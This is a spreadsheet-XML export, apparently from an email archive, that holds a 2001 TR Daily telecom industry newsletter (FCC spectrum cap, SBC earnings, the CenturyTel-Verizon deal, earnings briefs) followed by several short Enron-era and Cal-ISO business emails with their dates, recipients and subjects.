_x000D_
NEWS IN BRIEF=20_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-07.htm_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
FCC MAY RAISE SPECTRUM CAP,_x000D_
EVENTUALLY LIFT IT ENTIRELY_x000D_
_x000D_
The FCC is considering raising for 18 months the cap on how much_x000D_
spectrum wireless carriers may hold in any one market before_x000D_
eliminating the restriction, sources said on Monday.=20_x000D_
_x000D_
Currently, wireless carriers can only hold 45 megahertz of_x000D_
spectrum in urban markets and 55 MHz in rural markets.  FCC_x000D_
Chairman Michael K. Powell has proposed raising the limit to 55_x000D_
MHz in urban markets for 18 months, according to sources.  Some_x000D_
other Commissioners have indicated they would be willing to_x000D_
establish a higher limit, according to one source._x000D_
_x000D_
Under proposals being discussed, after 18 months, the FCC would_x000D_
either "sunset" the restriction or forbear from enforcing it, a_x000D_
source said.  The Commission plans to vote on the proposed_x000D_
changes at its Nov. 8 meeting, sources said._x000D_
_x000D_
Much of the wireless industry has long urged the FCC to remove_x000D_
the cap, saying it is no longer needed to ensure competition in_x000D_
the marketplace and instead is thwarting carriers' growth.  Since_x000D_
the Sept. 11 attacks, industry officials have stressed that_x000D_
carriers need access to additional frequencies to handle the_x000D_
increased traffic after emergencies._x000D_
_x000D_
"We think the time has come to eliminate the cap altogether,"_x000D_
said Diane Cornell, vice president-regulatory policy for the_x000D_
Cellular Telecommunications &amp; Internet Association.  "The market_x000D_
is very competitive."  She added that the Commission and the_x000D_
Justice Department have the authority to "reach out and address_x000D_
any competition issues."_x000D_
_x000D_
But smaller providers and some consumer advocates contend that_x000D_
the cap is still necessary to ensure that smaller players are not_x000D_
forced out of the market._x000D_
_x000D_
-- Paul Kirby, pkirby@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
SBC COMMUNICATIONS SHOWS LOW REVENUE GROWTH,_x000D_
PLANS TO CUT SEVERAL THOUSAND JOBS=20_x000D_
_x000D_
SBC Communications Inc. posted year-over-year revenue growth of_x000D_
just 0.8% in the third quarter excluding one-time items, and said_x000D_
on Monday it plans to eliminate several thousand jobs and cut_x000D_
capital spending by up to 20% next year._x000D_
_x000D_
For the quarter ended Sept. 30, SBC generated $13.5 billion of_x000D_
revenues, less than one percentage point above the year-ago_x000D_
total.  Driving top-line performance during the quarter were $2.2_x000D_
billion in data revenues, up from $2.0 billion in last year's_x000D_
third quarter, a net gain of 150,000 DSL (direct subscriber line)_x000D_
Internet service lines, and 13.6% revenue growth at Cingular_x000D_
Wireless, in which SBC holds a 60% equity stake.=20_x000D_
_x000D_
Net income of $2.0 billion, or $0.59 per share, met forecasted_x000D_
levels, and was slightly higher than the $1.96 billion of profit_x000D_
recorded in the year-ago quarter.  SBC said it continues to "work_x000D_
toward" its previously-stated full-year earnings target of $2.35_x000D_
per share. =20_x000D_
_x000D_
With larger financial performance gains hard to come by, SBC_x000D_
management indicated the firm will be concentrating on expense_x000D_
savings to shore up future results. "The impact of a tough_x000D_
economy is being exacerbated by an adverse and uncertain regula-_x000D_
tory environment, so we've taken the steps required to maintain_x000D_
our keen focus on controlling expenses, strengthening margins and_x000D_
maintaining financial flexibility," said Edward Whitacre Jr.,_x000D_
chief executive officer.=20_x000D_
_x000D_
"Overall conditions have worsened in recent months, making for_x000D_
one of the most challenging business environments in recent memo-_x000D_
ry," Mr. Whitacre said.  He added that the current downturn is_x000D_
expected to hamper business and consumer demand through 2002, in_x000D_
turn putting "significant pressure" on SBC's ability to improve_x000D_
its financial performance next year. "In response to these_x000D_
challenges, we must reduce our work force by several thousand_x000D_
jobs and cut our capital spending by approximately 20% in 2002,"_x000D_
the CEO said. =20_x000D_
_x000D_
In particular, Mr. Whitacre blamed existing federal telecom_x000D_
regulations for exerting a significant drag on expansion of the_x000D_
firm's DSL business and adding hundreds of millions of dollars to_x000D_
SBC's costs in providing the service.  And because of the heavy_x000D_
hand of regulations, SBC said, the company will slow its build-_x000D_
out of broadband service.  "No responsible company could justify_x000D_
fully deploying broadband capabilities and investing in new_x000D_
advanced networks in the face of this uncertain environment," Mr._x000D_
Whitacre said.=20_x000D_
_x000D_
Cutting against the grain of a broader market rally, SBC common_x000D_
stock fared poorly on Monday, closing down $2.24 per share, or_x000D_
about 5%, at $41.40.  Goldman Sachs telecom analyst Frank_x000D_
Governali noted that while SBC made its bottom-line target for_x000D_
the quarter, the earnings report revealed a "greater than expect-_x000D_
ed" erosion in revenue growth.  As a result, the analyst trimmed_x000D_
expectations on SBC's 2002 revenue growth to 2.0% from a previous_x000D_
figure of 4.7%, and cut the 2002 full-year earnings estimate from_x000D_
$2.45 per share, to $2.35 per share.=20_x000D_
_x000D_
-- John Curran, jcurran@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
U.S. BANKRUPTCY COURT RESCHEDULES NextWave=20_x000D_
HEARING ON DISCLOSURE. STATEMENT_x000D_
_x000D_
A bankruptcy court on Monday rescheduled a NextWave Telecom,_x000D_
Inc., hearing that had been scheduled for today.  NextWave had_x000D_
asked for the hearing to be continued until Nov. 1, but the_x000D_
session was set for Nov. 2 because of an attorney's scheduling_x000D_
conflict, according to a court clerk._x000D_
_x000D_
At the hearing, the court will consider the adequacy of_x000D_
NextWave's disclosure statement, which accompanied its bankruptcy_x000D_
reorganization plan, and whether to approve the carrier's tech-_x000D_
nology cooperation and subscription agreements with QUALCOMM,_x000D_
Inc._x000D_
_x000D_
The action by Judge Adlai S. Hardin Jr. of the U.S. Bankruptcy_x000D_
Court for the Southern District of New York (White Plains) came_x000D_
as several wireless carriers that bid on NextWave's spectrum at_x000D_
an auction earlier this year continued negotiating an agreement_x000D_
with NextWave and the FCC that could settle the 5-year-old_x000D_
dispute involving NextWave's "C" and "F" block PCS (personal_x000D_
communications service) licenses._x000D_
_x000D_
Last Friday, the federal government asked the U.S. Supreme Court_x000D_
to review a lower court's ruling that the FCC illegally reclaimed_x000D_
the carrier's licenses (TR, Oct. 22).  Filing separate petitions_x000D_
for a writ of certiorari were Verizon Wireless, and VoiceStream_x000D_
Wireless Corp., Arctic Slope Regional Corp., and Council Tree_x000D_
Communications LLC.  Arctic Slope is the managing member of_x000D_
Alaska Native Wireless LLC, the second-highest bidder at the_x000D_
auction of NextWave's spectrum._x000D_
_x000D_
Like the government, the carriers filed their petitions to_x000D_
preserve their rights in the case, according to a source.  "We_x000D_
want a settlement to work," the source told TR Daily today._x000D_
_x000D_
-- Paul Kirby, pkirby@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
CenturyTel TO PAY $2.15B FOR VERIZON's=20_x000D_
ALABAMA, MISSOURI EXCHANGES_x000D_
_x000D_
CenturyTel, Inc.'s plan to expand its rural wireline operations_x000D_
via the acquisition route took a big step forward today, as the_x000D_
company announced an agreement to purchase all of Verizon Commu-_x000D_
nications, Inc.'s access lines in Alabama and Missouri for $2.159_x000D_
billion. =20_x000D_
_x000D_
The proposed transactions includes 90 wireline telephone exchang-_x000D_
es and 306,000 access lines in Alabama, and 98 exchanges and_x000D_
about 369,000 access lines in Missouri, the companies said.  Upon_x000D_
completion of the transaction, about 450 Verizon wireline employ-_x000D_
ees in Alabama and 500 Missouri workers will become employees of_x000D_
CenturyTel, they said._x000D_
_x000D_
"This transaction will allow us to sharpen our focus on competing_x000D_
in targeted markets and on growing the company," said Verizon_x000D_
President and Vice Chairman Lawrence T. Babbio Jr.  "We will_x000D_
focus resources on states where we have greater critical mass in_x000D_
terms of operations support and clustered markets," he said.=20_x000D_
"Verizon and CenturyTel worked together to reach an agreement_x000D_
that provides for the fair and equitable treatment of the affect-_x000D_
ed Verizon employees in Alabama and Missouri."_x000D_
_x000D_
For CenturyTel, the deal fits with its strategy of becoming the_x000D_
"leading pure-play rural local exchange carrier."  In rebuffing_x000D_
ALLTEL Corp.'s takeover bid earlier this year, CenturyTel offi-_x000D_
cials said the company planned to expand its rural wireline_x000D_
operations and sell its wireless business (TR, Aug. 22 and Aug._x000D_
27)._x000D_
_x000D_
The proposed transaction with Verizon requires approval by the_x000D_
Alabama and Missouri public service commissions, the FCC, and the_x000D_
Department of Justice, the companies said.  They hope to complete_x000D_
the transaction during the second half of next year._x000D_
_x000D_
-- Ryan Oremland, roremland@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
VERIZON SEEKS END TO UNBUNDLED=20_x000D_
LOCAL SWITCHING_x000D_
_x000D_
The FCC should eliminate, "or at a minimum significantly limit,"_x000D_
incumbent local exchange carriers' obligation to provide local_x000D_
switching to competitors as an unbundled network element (UNE),_x000D_
Verizon Communications, Inc., told the FCC late Friday, Oct. 19._x000D_
_x000D_
In response to a federal appellate court's remand of an earlier_x000D_
FCC order that listed the UNEs incumbent telcos must provide_x000D_
competitors, the Commission is currently considering which_x000D_
network elements it is "necessary" for a competitor to have_x000D_
access to.  It is also considering whether failure to provide_x000D_
access to a given UNE would "impair" a competitor's ability to_x000D_
provide service.  The U.S. Court of Appeals in Washington had_x000D_
remanded the FCC's previous UNE order in Common Carrier docket_x000D_
96-98 because it failed to consider the "necessary" and "impair"_x000D_
standards laid out section 251(d)(2) of the Telecommunications_x000D_
Act of 1996._x000D_
_x000D_
In an ex parte letter filed late Friday, Oct. 19, Verizon told_x000D_
the FCC that "the deployment and use of competitive local switch-_x000D_
ing is a success story," and that therefore unbundled provision_x000D_
of local switching is not necessary.  It also argued that the_x000D_
availability of unbundled local switching at prices based on the_x000D_
TELRIC (total-element long-run incremental cost) methodology_x000D_
"undermines investment in competing facilities."_x000D_
_x000D_
-- Lynn Stanton, lstanton@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
CLEARER VISION ON BROADBAND POLICY_x000D_
REQUIRED, 3COM EXECUTIVE SAYS_x000D_
_x000D_
A significant problem with the slow deployment of broadband_x000D_
services is a lack of clear policy vision on the issue, as well_x000D_
as a commonly shared definition of "broadband" itself, said Eric_x000D_
Benhamou, chairman of 3Com Corp. and Palm, Inc., on Monday in a_x000D_
talk before the New America Foundation. "Our expectations have_x000D_
been significantly disappointed," he said._x000D_
_x000D_
For some, the definition of broadband is 256 kilobits per second,_x000D_
while others think an ISDN (integrated services digital network)_x000D_
line is broadband, Mr. Benhamou said.  "We have set our sights_x000D_
fairly low. . .in trying to use existing architectures like_x000D_
[copper wires or coaxial cable].  It's not how you would build it_x000D_
from scratch," he said._x000D_
_x000D_
But while the Telecommunications Act of 1996 failed to create_x000D_
competition in the local market and to spur CLEC (competitive_x000D_
local exchange carrier) broadband deployment, the Act did bring_x000D_
more options for broadband services from other sources such as_x000D_
wireless, cable TV, and even incumbent local exchange carriers,_x000D_
he said._x000D_
_x000D_
Mr. Benhamou said the information technology industry has lacked_x000D_
a "powerful, inspiring vision" for broadband.  IT executives need_x000D_
to get together and create a strong vision, such as, "Delivery of_x000D_
100 megabits per second to 100 million households by the end of_x000D_
the decade," he said.  That focus on a common goal would create a_x000D_
technology-neutral policy transformation, he said, and advances_x000D_
in technology and innovation would make that goal possible._x000D_
_x000D_
He also urged against government favoritism in promoting the_x000D_
availability of broadband.  "There should be no policy for the_x000D_
promotion of any technology [for example, DSL (digital subscriber_x000D_
line) or cable modem services].  It's bad when government picks_x000D_
the technology."_x000D_
_x000D_
-- Ed Rovetto, erovetto@tr.com_x000D_
_x000D_
_x000D_
*****************************************************************_x000D_
TELECOM EARNINGS ROUNDUP_x000D_
_x000D_
Brightpoint Inc., an Indianapolis-based mobile phone distributor,_x000D_
disclosed that revenues for the third quarter of this year are_x000D_
expected to total $499 million -- below the guidance previously_x000D_
supplied by management.  Brightpoint expects to report third_x000D_
quarter losses in the range of $0.12 to $0.14 per share.  Helping_x000D_
to drive the losses were especially difficult conditions in_x000D_
Brazil and Venezuela, the company said.  Brightpoint is due to_x000D_
report official third quarter results on Nov. 1. =20_x000D_
_x000D_
Network Plus Corp. reported third quarter revenues of $76.2_x000D_
million, up 23% from the $62.1 million of revenues generated in_x000D_
the same quarter last year.  Net loss for the most recent quarter_x000D_
widened to $28.7 million, from a loss of $20.7 million last year.=20_x000D_
Network Plus, a competitive local exchange provider, noted that_x000D_
it broke into positive EBITDA (earnings before interest, taxes,_x000D_
depreciation and amortization) territory during the third quarter_x000D_
with a $104,096 EBITDA profit, compared to a $4.9 million EBITDA_x000D_
loss in the year-ago quarter.=20_x000D_
_x000D_
Cogeco Cable Ltd., based in Montreal, generated $69.7 million in_x000D_
revenues for its fiscal fourth quarter ended Aug. 31, up 12.7%_x000D_
from the $61.8 million in revenues booked in the year-ago quar-_x000D_
ter.  Net income in the most recent quarter totaled $2.1 million,_x000D_
versus $410,000 last year.  For the full fiscal year 2001, Cogeco_x000D_
reported revenues of $277.7 million and net income of $3.6_x000D_
million, compared to $235 million of revenues and $7.3 million of_x000D_
net income last year.   The company said it expects to achieve 9%_x000D_
revenue growth in fiscal 2002.=20_x000D_
_x000D_
ANADIGICS, Inc. said that third quarter revenues sank to $16.3_x000D_
million, from $51.0 million in the year-ago quarter.  The compa-_x000D_
ny, which makes radio frequency integrated circuits for broadband_x000D_
and wireless communications, posted a $22.3 million net loss in_x000D_
the most recent quarter, compared to a $7.0 million profit in the_x000D_
same quarter last year.  ANADIGICS said it expects to generate up_x000D_
to $18.5 million in revenues during the fourth quarter, and_x000D_
forecasts a return to profitability during the second half of_x000D_
2002. =20_x000D_
_x000D_
360networks Inc., the Vancouver fiber optic network services_x000D_
provider in bankruptcy proceedings, announced that revenues for_x000D_
the first half of 2001 fell to $17 million, from $234 million in_x000D_
the comparable period last year.  "The decreases are due to the_x000D_
renegotiation of a number of dark fiber contracts," the company_x000D_
said, adding that it took an asset impairment charge of $4.4_x000D_
billion to reflect the downturn in telecom and data communica-_x000D_
tions markets.  EBITDA loss for the first six months of 2001 was_x000D_
$429 million, versus positive EBITDA of $51 million for the same_x000D_
period last year.  =20_x000D_
_x000D_
*****************************************************************_x000D_
NEWS IN BRIEF=20_x000D_
_x000D_
Eagle Broadband has named Manny M. Carter president and chief_x000D_
operating officer.  He was president and chief executive officer_x000D_
of Mobile Oil Caribe.  H. Dean Cubley will remain Eagle's chair-_x000D_
man and CEO.  The company also promoted Roger Ihde to VP-adminis-_x000D_
tration and strategic planning, and James Futer to executive VP_x000D_
and director-international activities.  Eagle, based in League_x000D_
City, Texas, is a wireline and wireless broadband provider....=20_x000D_
_x000D_
Jose A. Segrera has been named chief financial officer of_x000D_
Terremark Worldwide, Inc.  Before joining the company in Aug._x000D_
2000, he was with First Com (now AT&amp;T Latin America).  Terremark_x000D_
is an Internet data company based in Miami...._x000D_
_x000D_
At Westell Technologies, Inc., Kurt Nelson has been named region-_x000D_
al sales vice president (channel sales), and Lisa East has been_x000D_
named product line director-customer network equipment.  Mr._x000D_
Nelson has held sales and management posts at @LinkNetworks,_x000D_
Inc.; Ameritech; and the Ohio Bell Telephone Co.  Ms. East was_x000D_
product line manager-DSL (digital subscriber line) products at 3-_x000D_
Com, Inc.  Westell is a broadband access company based in Aurora,_x000D_
Ill...._x000D_
_x000D_
The World Trade Organization's fourth Ministerial Conference,_x000D_
scheduled in Doha, Qatar from Nov. 9-13, will go ahead as sched-_x000D_
uled, according to WTO Director-General Mike Moore.  "We are_x000D_
going ahead. I am confident with the planning and preparations_x000D_
here in Doha.  If something seismic or catastrophic happens we_x000D_
will reconsider.  But we're planning to come here to Doha in just_x000D_
over two weeks time," Mr. Moore said today in a press release._x000D_
_x000D_
Commerce Secretary Donald L. Evans issued a statement today_x000D_
calling on the Senate to vote "as soon as possible" to reinstate_x000D_
the ban on Internet taxes for "at least two years."  The three-_x000D_
year moratorium expired yesterday.  The House last week approved_x000D_
legislation that would have extended the moratorium until Nov. 1,_x000D_
2003, but the Senate failed to consider the bill before the ban_x000D_
expired (TR, Oct. 22).  In his statement today, Mr. Evans said,_x000D_
"In a time of uncertainty, we must continue to reassure consum-_x000D_
ers, businesses, and markets that we continue to create the right_x000D_
environment for growth.  Extending the moratorium will do that."=20_x000D_
_x000D_
Motorola Inc. revealed plans to raise more than $1.2 billion_x000D_
through the sale of equity units consisting of senior notes plus_x000D_
contracts to buy Motorola common stock, as well as senior unse-_x000D_
cured notes.  Proceeds are slated to reduce short-term debt and_x000D_
for other corporate purposes.=20_x000D_
_x000D_
RCN Corp. said it closed its "dutch auction" debt buyback offers_x000D_
with agreements to purchase $593 million face amount of outstand-_x000D_
ing junk bonds for $161 million.=20_x000D_
_x000D_
L-3 Communications completed a previously announced sale of $350_x000D_
million of 4% senior subordinated convertible contingent debt_x000D_
securities due 2011.  The securities are convertible into L-3_x000D_
common stock at $107.62 per share.  Proceeds from the offering_x000D_
may be used to fund acquisitions, the company said.=20_x000D_
_x000D_
UbiquiTel Inc. completed the sale of the California spectrum of_x000D_
VIA Wireless to VoiceStream Wireless.  Purchase price was $50_x000D_
million.  VIA Wireless was acquired in August by UbiquiTel, a_x000D_
Conshocken, Pa.-based provider of Sprint PCS digital wireless_x000D_
services...._x000D_
_x000D_
Cable Design Technologies Corp. entered agreements to purchase a_x000D_
79% stake in Prague-based Kabelovna Decin - Podmokly S.A., a_x000D_
manufacturer of communications and fiber optic cable.  Terms were_x000D_
not disclosed, but Cable Design said the acquisition is expected_x000D_
to be accretive to earnings...._x000D_
_x000D_
Brightpoint, Inc. completed its acquisitions of the common stock_x000D_
of Mega-Hertz SARL, and assets of Dirland S.A., both of France._x000D_
Terms of the deals were not disclosed, but Brightpoint said that_x000D_
the acquired businesses generated about $46 million of revenues_x000D_
last year...._x000D_
_x000D_
AOL Time Warner Inc. announced an agreement to distribute its_x000D_
CETV channel to cable television subscribers in the southern_x000D_
region of the People's Republic of China.  The agreement was_x000D_
hailed by AOL as the first instance in which a foreign TV insti-_x000D_
tution has been permitted cable TV carriages rights in mainland_x000D_
China.  CETV is a 24-hour Mandarin language information and_x000D_
entertainment channel. As part of the deal, AOL Time Warner will_x000D_
carry a 24-hour channel produced by China Central Television, the_x000D_
country's national television network...._x000D_
_x000D_
Viasystems Group, a supplier of electronic manufacturing services_x000D_
to the telecom sector, among others, said its shareholders_x000D_
approved a transaction enabling the firm to issue ten million_x000D_
share of common stock to Hicks, Muse, Tate &amp; Furst Inc.  The_x000D_
stock would be issued to Hicks Muse upon exercise of warrants_x000D_
associated with a $100 million note that Hicks Muse placed with_x000D_
Viasystems in July...._x000D_
_x000D_
Telex Communications, Inc. extended the expiration date of its_x000D_
subordinated note exchange offers to Oct. 26.  The extension was_x000D_
announced as Telex continues to seek financing for its proposed_x000D_
debt restructuring plan, of which the exchange offers are a_x000D_
part...._x000D_
_x000D_
McLeodUSA Inc. said it deferred payment of a quarterly stock_x000D_
dividend on its outstanding Series A preferred stock.  The_x000D_
dividend historically has been paid in shares of McLeodUSA Class_x000D_
A common stock.  However, since the market price of the common_x000D_
stock has declined substantially in recent months, McLeodUSA said_x000D_
it deferred the payment rather than issue more than seven million_x000D_
shares of new common stock to cover the payment...._x000D_
_x000D_
Startec Global Communications Corp. shareholders approved a_x000D_
measure to increase the company's authorized common stock to 300_x000D_
million shares.  The increase was sought by management to further_x000D_
a "preliminary and tentative agreement" with Startec bondholders_x000D_
to restructure the firm's $160 million of outstanding senior_x000D_
notes.  Based in Potomac, Md., Startec is a facilities-based_x000D_
provider of Internet Protocol telecom services...._x000D_
_x000D_
IntelliSpace said it that it secured an additional $10 million in_x000D_
venture financing through funders including Halpern Denny &amp; Co.,_x000D_
bringing its fund-raising total to $110 million since inception.=20_x000D_
Based in New York, IntelliSpace is an Ethernet IP broadband_x000D_
services provider.... =20_x000D_
_x000D_
Ikanos Communications, Inc. announced that it raised an addition-_x000D_
al $5.1 million of venture financing from funders including Intel_x000D_
Capital and VentureTech LLC.  Ikanos, based in Fremont, Calif.,_x000D_
develops next-generation broadband semiconductors.=20_x000D_
_x000D_
_x000D_
********************************************************_x000D_
TR DAILY Copyright 2001 Telecommunications Reports International,_x000D_
Inc., (ISSN 1082-9350) is transmitted weekdays, except for_x000D_
holidays.  Visit us on the World Wide Web at http://www.tr.com.=20_x000D_
Published by the Business &amp; Finance Group of CCH INCORPORATED._x000D_
_x000D_
Editor: John Curran_x000D_
Associate Editor: Tom Leithauser_x000D_
Associate Editor: Ryan Oremland_x000D_
Associate Editor: Ed Rovetto_x000D_
Publisher: Stephen P. Munro_x000D_
1333 H Street, NW, 1st Floor-East Tower, Washington, DC 20005_x000D_
Editorial Information: Telephone:  (202) 312-6060_x000D_
                       Fax:  (202) 312-6111_x000D_
                       Email: jcurran@tr.com_x000D_
                              tleithauser@tr.com_x000D_
_x000D_
Customer Service:      Telephone:  (202) 312-6050_x000D_
                                   (877) 874-8737_x000D_
                       Fax:  (202) 312-6116_x000D_
                       Email: customerservice@tr.com_x000D_
_x000D_
Federal copyright law prohibits duplication or reproduction in_x000D_
any form, including electronic, without permission of the_x000D_
publisher.=1A</t>
  </si>
  <si>
    <t>Tue, 30 May 2000 10:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aleonard@caiso.com'})</t>
  </si>
  <si>
    <t>frozenset({'pgs@ieee.org', 'cjones@swc.org', 'cabaker@duke-energy.com', 'mccreem@sce.com', 'marketparticipants@caiso.com', 'jburne@ladwp.com', 'rluck@dwp.ci.la.ca.us', 'mwynne@uoc.com', 'foothi19@idt.net', 'braun@braunlegal.com', 'bmspeckman@aol.com', 'kfyip@seiworldwide.com', 'brbarkovich@earthlink.net', 'rjhickok@duke-energy.com', 'sce2@caiso.com'})</t>
  </si>
  <si>
    <t>CAISO Notification: Joint 2002-2004 RMR Study &amp; Integrated Annual_x000D_
 Expansion Plan Study Stakeholder Meeting</t>
  </si>
  <si>
    <t>&gt; Market Participants,_x000D_
&gt;_x000D_
&gt; The Cal-ISO has begun preparations for performing the technical study to_x000D_
&gt; determine RMR MW requirements for the ISO-controlled grid in years_x000D_
&gt; 2002-2004. The results of this Study will be used in the Multi-year LARS_x000D_
&gt; 2002-2004 RMR process tentatively scheduled for the 1st quarter of 2001._x000D_
&gt; Some preliminary work has been done to formulate a draft Study Plan and to_x000D_
&gt; develop Base Cases to perform the 2002-2004 RMR Technical Study. The draft_x000D_
&gt; Study Plan and Base Cases have been posted on the ISO web site:_x000D_
&gt; http://www.caiso.com/docs/2000/04/28/2000042807462411493.html_x000D_
&gt;_x000D_
&gt; In addition, the Cal-ISO has developed a draft Study Plan and are_x000D_
&gt; developing Base Cases to perform this year's Integrated Transmission_x000D_
&gt; Expansion Plan that will supplement the PTOs annual Transmission Expansion_x000D_
&gt; Plans. The draft Study Plan will be posted by 6/1/00, and the Base Cases_x000D_
&gt; will be posted by 6/7/00 on the ISO Web site :_x000D_
&gt; http://www.caiso.com/docs/2000/02/28/2000022816395812019.html_x000D_
&gt;_x000D_
&gt; A joint RMR and Expansion Plan Study "kick-off" Stakeholder meeting will_x000D_
&gt; be held on Monday June 12, 2000, between 10:00 a.m. and 4:00 p.m., in_x000D_
&gt; Conference Room 101A-Rooms 1a &amp; 1b at Cal-ISO Headquarters on 101A Blue_x000D_
&gt; Ravine Road in Folsom to discuss these preliminary Study work products._x000D_
&gt; THE FOCUS OF THIS MEETING WILL BE ON TECHNICAL STUDY ISSUES - NOT ON_x000D_
&gt; POLICY.   The meeting agenda is attached._x000D_
&gt;_x000D_
&gt; Please RSVP by Wednesday June 7, 2000, including the number of attendees_x000D_
&gt; from your organization, to Kristine Hargrave of the Cal-ISO at (916)_x000D_
&gt; 351-4470 or khargrave@caiso.com._x000D_
&gt;_x000D_
&gt; If you have questions regarding the meeting arrangements, please contact_x000D_
&gt; Kristine. If you have questions regarding the Study efforts, please_x000D_
&gt; contact Steve Mavis at 916-351-2112 or smavis@caiso.com._x000D_
&gt;_x000D_
&gt;  &lt;&lt;Joint RMR and Expansion Plan Study agenda jun12.pdf&gt;&gt;_x000D_
&gt;_x000D_
Don Fuller_x000D_
Director, Client Relations_x000D_
_x000D_
Sent on behalf of Don Fuller by Alice Leonard_x000D_
_x000D_
Alice Leonard_x000D_
Client Relations_x000D_
(916) 351-4467_x000D_
aleonard@caiso.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Joint RMR and Expansion Plan Study agenda jun12.pdf</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 09:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Closed: Access Request for joey.taylor@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">The request has been completed with all resources requested either completed _x000D_
or rejected. You can view the details of the  request by clicking _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000010917&amp;Page=_x000D_
MyReq._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 05:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Confidentiality provisions in various forms</t>
  </si>
  <si>
    <t>I think that is a great observation.  I would suggest that the language be _x000D_
fairly broad to include both potential assignees and potential _x000D_
investors/joint-venturers.  You might also consider anticipating some of our _x000D_
counterparties' concerns by including a provision like this  . . . . so long _x000D_
as such potential assignee or potential investor/joint venturer enters into _x000D_
an agreement to protect the confidentiality of such information.  This is an _x000D_
easy give because we always get a CA in place before disclosing information.  _x000D_
I would steer clear of any modification to that provision which requires (i) _x000D_
a minimum term for the CA, (ii) agreement by the counterparty to the form of _x000D_
CA or (iii) the proposed assignee or potential investor to put itself in _x000D_
direct privity with the counterparty._x000D_
_x000D_
Just my thoughts_x000D_
_x000D_
Stuart</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Proposal to Caithness Big Sandy</t>
  </si>
  <si>
    <t xml:space="preserve">Looks good--I'm faxing some minor comments.  Give George my best!  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffery Fawcett_x000D_
11/21/2000 01:17 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON, Steven Harris/ET&amp;S/Enron@ENRON, Kevin _x000D_
Hyatt/ET&amp;S/Enron@Enron_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON, Keith Petersen/ET&amp;S/Enron@ENRON, Ronald _x000D_
Matthews/ET&amp;S/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, James _x000D_
Centilli/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Proposal to Caithness Big Sandy_x000D_
_x000D_
Attached for your review and comment is a broad outline of a rate proposal to _x000D_
Caithness for the construction and operation of the 40-mile lateral to the _x000D_
Big Sandy project.  This non-binding proposal was requested by Caithness' _x000D_
consultant, George Briden, as a starting point for modeling the economics of _x000D_
the project's gas supply and a basis for further discussions aimed at _x000D_
designing an appropriate deal structure.  For your information, James _x000D_
Centilli calculated the transport rate based on the (+/- 30%) $20.33MM cost _x000D_
estimate with a ten-year (contract) amortization.  _x000D_
_x000D_
I plan to put this in the mail by the close of business tomorrow.  If you _x000D_
have any suggestions, please let me hear from you by mid-day.   Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 03:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jfleming@rice.edu'})</t>
  </si>
  <si>
    <t>Course outlines</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
I am sending you a draft of the outline  of the course on energy derivatives._x000D_
I would  appreciate your comments before I finalize it._x000D_
_x000D_
By the way, did we agree on the time schedule for the class?_x000D_
Tuesday or Thursday evening would work for me._x000D_
_x000D_
Vince_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'esmith@kanekatexas.com'})</t>
  </si>
  <si>
    <t>RE: Weekend Happenings</t>
  </si>
  <si>
    <t>you know i am always in need of some male bonding.  You guys decide if you _x000D_
want to go to Jazz Fest?  Do not forget about my mom's offer relating to said _x000D_
event.  Talk to you soon._x000D_
PL</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 11:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>The dot is coming</t>
  </si>
  <si>
    <t>That's right; the dot is coming.  Prepare to be enlightened, entertained and _x000D_
engaged.  Prepare to receive information online that is so current, your _x000D_
mouse will be hiding under its mousepad.  Prepare to enter a brave new world _x000D_
of communication at Enron.  A world in which news is delivered so quickly you _x000D_
just might not be able to keep up._x000D_
_x000D_
A world in which we can rest easy that the information we need will be _x000D_
delivered with the speed and efficiency the Most Innovative Company in _x000D_
America deserves._x000D_
_x000D_
The dot is coming.  And it's bringing news you can use.  Now.</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 18:38:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Shut - In costs</t>
  </si>
  <si>
    <t>Grigs,_x000D_
_x000D_
I talked to Lambie (our resident produciton and reserve expert) about this and he thought it was highly unlikely that producers would shut in eastern rocks production for a couple of reasons. Apparently, if you shut in coal bed methane production there is a serious risk that the well will "water out" either ruining the well or causing 6 months to a year of production delays. Also, it seem logistically unlikely due to the small production volumes associated with each individual well (100-500 mm/d). In Chris's opinion coal bed methane would be some of the last production we would ever see shut in. Hope this helps. Let me know if you learn anything further._x000D_
_x000D_
Chris_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Grigsby, Mike  _x000D_
Sent:	Tuesday, October 02, 2001 3:30 PM_x000D_
To:	Dorland, Chris; Cowan, Mike_x000D_
Subject:	Shut - In costs_x000D_
_x000D_
